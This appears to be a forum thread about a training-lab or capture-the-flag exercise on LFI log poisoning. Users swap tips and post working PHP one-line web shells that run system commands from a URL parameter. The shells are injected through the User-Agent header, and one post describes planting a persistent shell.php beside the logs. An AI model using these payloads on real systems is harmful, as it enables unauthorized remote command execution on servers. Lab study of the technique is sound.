For the log poisoning this is the web shell that worked for me and I didn’t have to reupload it everytime i input a command.
<?php echo shell_exec($_GET['cmd']); ?>
Well that was a waste of three hours because of a missing backslash.
<?php system(\$_GET['cmd']); ?>
4 Likes
I Finally did it!, It is very simple but i was dumb with qoutes, Spoiler alert.
Let me give u tips, 1st u need another page that has LFI, using the 1st page u got with LFI, then on the Log Poisioning, use "
<?php system($_GET['cmd']); ?>
" not "
<?php system($_GET["cmd"]); ?>
", if you used the 2nd one, the " between the cmd will break the log file and it will crash.
If you are forced to rewrite the shell after each command, you can create a stable shell with echo '<?php ... ?> > the same path as logs>shell.php and then you can acces it …/…/shell.php.
This is the correct answer, no need to encode it just pass as is via curl user agent param.
I’m having the same issue were you able to solve it??
nvm this is stupid I kept doing the same thing and eventually it worked, I don’t know why it didn’t work before. just keep trying I guess…
* User-Agent:<?php system($_GET["cmd"]); ?>
how did you know to include the backslash? this worked for me but the other solutions that worked for others in this thread did not work for me.
Thank you man, however I had to reboot the machine several times to get the flag.
Thanks so much. That is insane. I spent 3 days to poison this log with unlimited variation of shell commands, tried to to poison error.log and session files etc. It worked only with back slash.
I think the matter is the vulnarability is so old and so rare, that it works different way every time.
An i am upset why there was no hint in this task